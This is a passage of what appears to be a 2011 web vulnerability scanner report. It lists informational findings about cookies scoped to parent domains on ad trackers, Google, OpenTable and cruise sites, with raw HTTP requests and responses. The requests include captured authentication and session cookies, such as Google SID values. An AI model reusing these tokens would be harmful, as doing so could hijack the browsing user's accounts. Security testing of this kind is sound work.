The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 03 Oct 2011 12:46:52 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 02-Oct-2013 12:46:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
11.4. http://bstats.adbrite.com/adserver/behavioral-data/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/behavioral-data/0?d=48380967;bapid=12761;uid=1043107 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13wid%2C13beg%2C15sx4"; vsd=0@1@4e891585@ads.pubmatic.com

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vsd=0@2@4e89aeca@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 12:47:06 GMT
Content-Type: image/gif
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 12:47:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
11.5. http://id.google.com/verify/EAAAAMspK6l-6mI9iMP5vGnYNYo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAMspK6l-6mI9iMP5vGnYNYo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMspK6l-6mI9iMP5vGnYNYo.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=cruise
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=fqsLaUjSPWvMYO8BtI9nUqcM8Igxtvva9lVVxa3a8A=GmXVJrMG-3eXV2V8; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=ecIV_Tm-rEMl5jaExXRwSq8RhfTWQ9nSjv8yB4NwEw=z99TqzASVoxVfev2; expires=Tue, 03-Apr-2012 12:40:25 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 03 Oct 2011 12:40:25 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
11.6. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=rylcrbnint_cs=1&betq=805=348090 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 12:41:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 12:41:02 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 03 Oct 2011 13:41:02 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
11.7. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.opentable.com
Path:   /b/ss/otcom/1/H.22.1--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/otcom/1/H.22.1--NS/0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: o.opentable.com

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 12:57:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]; Expires=Sat, 1 Oct 2016 12:57:36 GMT; Domain=.opentable.com; Path=/
Location: http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0?AQB=1&pccr=true&vidn=2744D8A0051597FB-40000176E00002C7&g=none&AQE=1
X-C: ms-4.5
Expires: Sun, 02 Oct 2011 12:57:36 GMT
Last-Modified: Tue, 04 Oct 2011 12:57:36 GMT
Cache-Control: no-cache, no-store, max-age=0, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www383
Content-Length: 0
Content-Type: text/plain

11.8. http://pixel.traveladvertising.com/Live/Pixel.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.traveladvertising.com
Path:   /Live/Pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Live/Pixel.aspx?PlacementId=49766 HTTP/1.1
Host: pixel.traveladvertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private, max-age=0
Content-Type: image/gif
Expires: Mon, 03 Oct 2011 12:47:07 GMT
Last-Modified: Mon, 03 Oct 2011 12:47:07 GMT
Location: http://ad.doubleclick.net/activity;src=3076867;type=celeb160;cat=celeb306;qty=1;cost=[Revenue]
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: tan_ct_49751=49751;Path=/;Domain=.traveladvertising.com;Expires=Sun, 01-Jan-2012 12:47:07 GMT
Set-Cookie: CookieId=18998dfb36064146bfba3fde05c02559;Path=/;Domain=.traveladvertising.com;Expires=Sun, 27-Jun-2060 12:47:07 GMT
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........L..;
11.9. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=1a-ycFsYb7TPva7ipM_9UQiCOoCfqyV9O_WTqaUZ19Kh5cu-MqDYZ3Xj0IBYf-bfGeIFKTNd3xzB36jrZoq6uw&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C5%7C1002%7C5%7C1004%7C9%7C6%7C3; rds=15231%7C15228%7C15250%7C15249%7C15250%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 12:47:06 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1442346&t=2
Date: Mon, 03 Oct 2011 12:47:06 GMT
Content-Length: 165

<html><body><p>Redirecting to <a href="http://ad.yieldmanager.com/pixel?id=1442346&amp;t=2">http://ad.yieldmanager.com/pixel?id=1442346&amp;t=2</a></p></body></html>
11.10. http://servedby.flashtalking.com/segment/modify/ah3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /segment/modify/ah3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /segment/modify/ah3;;pixel/?name=HiltonHomepagecomDE HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2013561;type=hilto339;cat=hilto778;ord=9654915034770.965?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343,ah3)|f20004352=(s:1-t:13702351)";Path=/;Domain=.flashtalking.com;Expires=Wed, 02-Oct-13 12:52:45 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 03 Oct 2011 12:52:45 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;
11.11. http://servedby.flashtalking.com/segment/modify/ahr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /segment/modify/ahr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /segment/modify/ahr;;pixel/?name=HiltonHomepageGlobalUK HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2013561;type=hilto339;cat=hilto778;ord=9654915034770.965?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343,ahr)|f20004352=(s:1-t:13702351)";Path=/;Domain=.flashtalking.com;Expires=Wed, 02-Oct-13 12:52:45 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 03 Oct 2011 12:52:45 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;
11.12. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=7871bv11074&tz=5&ref=&page=http%3A%2F%2Fwww.cruises.com%2F&uuid=7200E557-607F-4F1A-82DB-75086671DFA2&rnd=11115697 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Mon, 03 Oct 2011 12:40:44 GMT
Connection: close
Set-Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33; Domain=marinsm.com; Expires=Tue, 02-Oct-2012 12:40:44 GMT; Path=/

GIF89a.............,...........D..;
11.13. https://www.cruisesonly.com/bcss/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /bcss/default.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386 HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46341
Content-Type: text/html
Set-Cookie: partnerStamp=21960764; domain=; path=/
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46341


   <script language="Javascript" src="/lib/javascript/validation/messagingobjects.js"></script>
<script language="javascript" src="/code/javascript/JSPopup.js"></script>
   <script languag
...[SNIP]...
11.14. http://www.opentable.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+17%3a21%3a22&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5; pgseq=; s_cc=true; s_nr=1317651710801-Repeat; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 14:21:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; expires=Sat, 03-Oct-1981 07:00:00 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100f310a61d67e345889bdb2fb7; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; domain=.opentable.com; path=/
Set-Cookie: em=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Vary: Accept-Encoding
Content-Length: 54918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
11.15. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 12:53:35 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:53:35 GMT; path=/
